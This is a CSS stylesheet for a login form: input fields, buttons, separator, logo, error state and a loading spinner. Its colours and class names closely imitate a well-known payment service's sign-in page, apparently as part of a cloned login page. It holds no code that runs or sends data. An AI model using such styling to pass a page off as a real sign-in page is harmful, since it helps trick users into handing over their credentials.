body{
	color: #2c2e2f;
    font-family: HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    font-size: 93.75%;
}
div {
    display: block;
}
.gs_1{
	margin: 0 auto;
	width: 460px;
}
.gs_12{
	padding: 42px 42px 36px;
	margin: 120px auto 0;
	border: 1px solid #eaeced;
}
.gs_14{
    margin: 20px 0;
    text-align: center;
    border-bottom: 0;
}
.gs_15{
    border-top: 1px solid #cbd2d6;
    position: relative;
    margin: 25px 0 10px;
    text-align: center;
}
.gs_15 .textInSeparator{
    background-color: #fff;
    padding: 0 .5em;
    position: relative;
    color: #6c7378;
    top: -.7em;
}
.gs_logo {
    background: transparent url(../images/gs_logo.svg) top center no-repeat;
    background-size: auto 28px;
    width: 129px;
    height: 32px;
    display: block;
    margin: 0 auto 20px;
    text-indent: 100%;
    overflow: hidden;
    white-space: nowrap;
}
.gs_input{
    height: 44px;
    width: 100%;
    padding: 0 10px;
    border: 1px solid #9da3a6;
    background: #fff;
    text-overflow: ellipsis;
    box-sizing: border-box;
    border-radius: 4px;
    box-shadow: none;
    color: #000;
    font-size: 1em;
    font-family: Helvetica,Arial,sans-serif;
    font-weight: 400;
    direction: ltr;
    -webkit-rtl-ordering: logical;
    cursor: text;
    -webkit-appearance: textfield;
    margin-bottom: 20px;
}
.gs_btn{
    width: 100%;
    min-height: 44px;
    padding: 0;
    border: 0;
    display: block;
    background-color: #0070ba;
    box-shadow: none;
    border-radius: 4px;
    box-sizing: border-box;
    cursor: pointer;
    -webkit-appearance: none;
    -webkit-tap-highlight-color: transparent;
    color: #fff;
    font-size: 1em;
    text-align: center;
    font-weight: 700;
    font-family: HelveticaNeue-Medium,"Helvetica Neue Medium",HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    text-shadow: none;
    text-decoration: none;
    transition: background-color .4s ease-out;
    -webkit-font-smoothing: antialiased;
}
.gs_btn2{
    background-color: #E1E7EB;
    color: #2C2E2F;
}
.gs_footer0{
    position: fixed;
    bottom: 0;
    left: 0;
    right: 0;
    font-size: 11px;
    padding-top: 14px;

}
.footer_group li{
    list-style-type: none;
    text-align: center;
    display: inline-block;
    margin: 0 10px 0 0;
}
ul li {
    margin: 0;
    padding: 0;
}
footer .gs_footer1{
    text-align: center;
    padding: 14px;
    background-color: #F7F9FA;
    color: #666;
    white-space: nowrap;
}
a{
    color: #0070ba;
    font-family: HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    font-weight: 400;
    text-decoration: none;
}
#gs_overlay{
    position: fixed;
    border-radius: 0px;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(255, 255, 255, 0.8);
    transition: opacity 0.3s ease-in;
    opacity: .99;
}
#gs_13_2{
    display:none
}
#gs_13_3{
    margin-bottom: 24px;
    text-align: center;
    font-family: HelveticaNeue-Light,"Helvetica Neue Light",HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
}
.profileDisplayEmail{
    text-align: center;
    white-space: nowrap;
    overflow: hidden;
    text-overflow: ellipsis;
    vertical-align: top;
    padding-right: 10px;
    max-width: 300px;
    display: inline-block;
    -webkit-font-smoothing: subpixel-antialiased;
}
.gs_error{
    border: 1px solid #c72f38;
    background-image: url(../images/sprite_form_2x.png);
    background-position: top -409px right 10px;
    background-size: 25px;
    background-repeat: no-repeat;
}
#gs_load{
    display: none;
}
#gs_load2{
    display: none;
}
#gs_loading{
  z-index: 2002;
  content: ' ';
  border-width: 6px;
  border-style: solid;
  border-color: #0070ba #0070ba #0070ba #ccc;
  position: absolute;
  top: 60%;
  left: 50%;
  height: 50px;
  width: 50px;
  display: inline-block;
  border-radius: 50%;
  animation: rotate .7s linear 0s infinite normal;
}
@keyframes rotate {
  from {
    transform: translate3d(-50%, -200%, 0) rotate(0);
  }
  to {
    transform: translate3d(-50%, -200%, 0) rotate(360deg);
  }
}